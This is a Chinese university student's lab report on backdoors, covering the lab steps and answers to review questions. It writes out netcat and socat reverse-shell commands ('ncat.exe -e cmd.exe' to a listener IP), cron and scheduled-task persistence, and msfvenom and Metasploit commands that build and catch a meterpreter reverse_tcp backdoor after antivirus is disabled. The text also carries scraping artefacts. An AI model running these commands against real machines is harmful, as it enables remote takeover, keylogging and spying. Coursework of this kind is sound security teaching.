20155207王雪纯 Exp2 后门原理与实践

20155207王雪纯 Exp2 后门原理与实践

实验步骤

1、windows获取Linux shell

Windows:使用 ipconfig 命令查看当前机器IP地址。 linux

进入ncat所在文件地址,使用ncat命令打开监听 shell

Linux反弹链接win: windows

2、Linux得到Windows Shell

在Linux终端输入命令ifconfig查看虚拟机Linux的IP号。 而后输入命令nc -l -p 5207让虚拟机开始监听指定端口5207网络

在Windows命令行终端输入命令ncat.exe -e cmd.exe Linux的IP 5207,让Windows准备监听端口5207 tcp

Linux得到Windows的相关信息,乱码是不可识别的中文学习

3、使用netcat获取主机操做Shell,cron启动

windows下监听端口:spa

输入ncat.exe -l 端口号命令行

linux链接端口:3d

输入nc windows_IP 端口号code

会话过程(可加入参数传输文件):

4、使用socat获取主机操做Shell, 任务计划启动

下载并解压socat

输入指令socat - tcp:windows_IP:5207

使用MSF meterpreter(或其余软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

关闭全部杀毒软件。

端输入命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=5207 -f exe > 20155207_backdoor.exe

创建后门程序

在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口。

输入如下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST Linux的IP
set LPORT 5223
show options

再输入exploit开始监听。

最后摄像头就是链接不上,不知道为撒

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

当咱们经过这样的第三方平台下载的软件,就颇有可能经过咱们的主动点击下载安装到本身的主机上,使本身的电脑感染木马病毒

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win:后门可能做为一个exe文件藏在主机下,而后经过诱导用户主动点击、修改注册表、添加到开机自启动项、或者和咱们经常使用的软件绑定在一块儿同时启动,具备很高的隐蔽性。

linux:linux中能够经过crontab功能将木马设为定时启动,也能够经过对正常软件的绑定注入shellcode达到开启后门的目的

(3)Meterpreter有哪些给你映像深入的功能?

录音拍照截屏以及记录键击,可能泄露大量隐私

(4)如何发现本身有系统有没有被安装后门?

安装可靠的杀毒软件

实验总结与体会

此次实践中,我掌握了了后门的基本原理及它的运行过程,让我从实践的角度切实了解到计算机后门的存在和一些初级的后门设置方法。但本次实验过程当中仍是很不顺利,常常出现差错,多是网络设置的问题,也多是我对实验理解不够透彻,最后用的同窗的电脑完成了实验,但愿在下次实验时可以进一步学习后门的有关知识

相关文章
相关标签/搜索